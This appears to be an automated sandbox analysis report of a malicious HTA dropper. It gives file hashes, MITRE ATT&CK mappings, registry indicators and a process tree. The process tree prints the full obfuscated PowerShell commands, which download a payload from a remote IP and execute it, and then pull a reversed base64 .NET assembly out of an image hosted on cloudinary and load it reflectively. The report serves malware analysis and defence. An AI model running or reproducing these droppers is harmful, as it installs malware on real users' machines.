4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
08-01-2025 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

begoodforeverythinggreatthingsformebetterforgood.hta
Size

108KB
MD5

b7bd51ea4a3cbb85901f5e467009beaa
SHA1

2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
SHA256

4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
SHA512

0d30af8454e5a74674e4f971e40a7c7781d0c29d48c25dd327b7bccad07f6208db24a078d8e03c07ae2bac7ac3ceba01b67668f7b3108456406c7a258fced032
SSDEEP

384:Fipci1dZ2FGFZrZi9qiA/zRj6TiezFSw4M7333j333V333x333kD333n33P333UM:zFLFSwkGpe1zOhVadsRZ4

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20

exe.dropper

https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2500	powershell.exe
6	588	powershell.exe
8	588	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2500	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
588	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2500	powershell.exe
588	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3044 wrote to memory of 2420	3044	mshta.exe	30
PID 3044 wrote to memory of 2420	3044	mshta.exe	30
PID 3044 wrote to memory of 2420	3044	mshta.exe	30
PID 3044 wrote to memory of 2420	3044	mshta.exe	30
PID 2420 wrote to memory of 2500	2420	cmd.exe	32
PID 2420 wrote to memory of 2500	2420	cmd.exe	32
PID 2420 wrote to memory of 2500	2420	cmd.exe	32
PID 2420 wrote to memory of 2500	2420	cmd.exe	32
PID 2500 wrote to memory of 2908	2500	powershell.exe	33
PID 2500 wrote to memory of 2908	2500	powershell.exe	33
PID 2500 wrote to memory of 2908	2500	powershell.exe	33
PID 2500 wrote to memory of 2908	2500	powershell.exe	33
PID 2908 wrote to memory of 2776	2908	csc.exe	34
PID 2908 wrote to memory of 2776	2908	csc.exe	34
PID 2908 wrote to memory of 2776	2908	csc.exe	34
PID 2908 wrote to memory of 2776	2908	csc.exe	34
PID 2500 wrote to memory of 1268	2500	powershell.exe	36
PID 2500 wrote to memory of 1268	2500	powershell.exe	36
PID 2500 wrote to memory of 1268	2500	powershell.exe	36
PID 2500 wrote to memory of 1268	2500	powershell.exe	36
PID 1268 wrote to memory of 588	1268	WScript.exe	37
PID 1268 wrote to memory of 588	1268	WScript.exe	37
PID 1268 wrote to memory of 588	1268	WScript.exe	37
PID 1268 wrote to memory of 588	1268	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\begoodforeverythinggreatthingsformebetterforgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e2-7rmeh.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F6B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2F6A.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2776
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab51CA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2F6B.tmp

Filesize
1KB

MD5
2eb078ae39bab76e8abea21ca0cf822b

SHA1
63053e5d53c2b51c008384b540df51b34c2bd004

SHA256
7755f4c3d99e5093c118a0a3d2bdbb52a6734268426e78b0042fab8de2367e2e

SHA512
a9bdf46e25b9d13bee2964e41b76136e856bd4de275e372651a217f94dd7a8472263a0867c142c9bd90d9f7419b14b98a0436103cc1462a00e95c69e7fd76f57

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar52B7.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\e2-7rmeh.dll

Filesize
3KB

MD5
0732246051fc3e35a0bcc789afe4528e

SHA1
de21bdbcf0fab59611cf4bd75854af80aa9918c6

SHA256
a2684ca9cd43a0c6676efbf20d20f8b300ebc3e3fac469acfc9616e19d4d613d

SHA512
ff4941e59a260d937688787f05e4f00e223ae0b915b4202967822eaf208d633058da4198d501f00319ce76d2f1334f3136e491281c03b7b7c863c286fa9ca567

Download Submit
C:\Users\Admin\AppData\Local\Temp\e2-7rmeh.pdb

Filesize
7KB

MD5
f15e96002c4bb42e26bc5d6c0c81084a

SHA1
1f52323b0980dec8a8e7daeec331de5010decab1

SHA256
f83bd8cf2d027e21e69200494f6a27abe768b5f8ed5708ab648d7d993a6bff1f

SHA512
1956d2ee77854072e6b3e5083b270bf3fd866b01096fcb35e915bd6ae2d8dd3b464107fd70cc5291c1f6fda24719a7bb8fc31bab372bf11da4650cf8ffe76af1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d1b5d819a039e4886904c6399f4d7b7b

SHA1
9d56cea8c078e2e386625654e4e076c5b08297e7

SHA256
fbedb1d376c2c8984658ded5a4506a05c4bf0549ae5e6fd2f4152e803dbb4cce

SHA512
5a0b924c25e75e17c4e0e2288b51b35a8e827bc5892b1138ddf8875ee89fc2ca9d9cd6a1ed89f4bcf71bb5f034244700c8015966c3e128aefc7db7019b37dafa

Download Submit
C:\Users\Admin\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS

Filesize
219KB

MD5
8ccd875893cd23b67d7c61ea735f5c52

SHA1
6171c7dd4f67a67fff0ca151c7e9a06104e00def

SHA256
16328212055d6aa79c45b6624607f74b732b159db4c6cdf7d8e6835ebdc6e392

SHA512
3ceb06944fb1cb3f176e9163f761e3c2d97e72a9e0177f417d4a83e03f4b539fbcb2d7ebe53865a483cacdc8eaf16ce292245aed1cc60c207f7ca038ced07f31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2F6A.tmp

Filesize
652B

MD5
f01a72375ec301a1be3f3831adb0f674

SHA1
afa687b02b03507399bbb4cc108459769db49016

SHA256
63a6d1a706d15fb9b70a1c0769a98295989deab07128fecffcee15b7d3df5f6a

SHA512
2f24c2c5617e8b15611f6353880bcbdd60bd32dbd28a4a1e615766d441954b093bef080963143ecf9c135cc50c3da4284fa1cedb5e28f29c8c17b630ef37faa2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e2-7rmeh.0.cs

Filesize
478B

MD5
7836723690e40c9d8fbf78fbd248c066

SHA1
6a0f9fb57575624ad9ca54108abb75cb6b20fd3d

SHA256
a1dd056c3c937dd2fef8d026745f706da97f13205feba1bdae492d4b2cad07a9

SHA512
10c093f3aaef531e31196afcc50fe7d554eee7d49206046f0d0a6dd86f23ce73067a7b926b6acac810a5d33ecc98b605b1ff1e6eaf0d404a4c1d9265f8ac06a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e2-7rmeh.cmdline

Filesize
309B

MD5
442977643f991b321de0a4b5a52e140f

SHA1
c84c4c1b6f655cfb9097625df58c804500778e8d

SHA256
23e8efcf89ce663e90e8853019bbf68c6d86078f55f2a07c5adf8dc239e8cf25

SHA512
3188f572356c36aa98cd4eabe567239c3fb12ee39b425dc46a6b3aaa00c403093b14971996377818a38688f4d813030e9401af74ae3ac76a93ce77a8a2441c38

Download Submit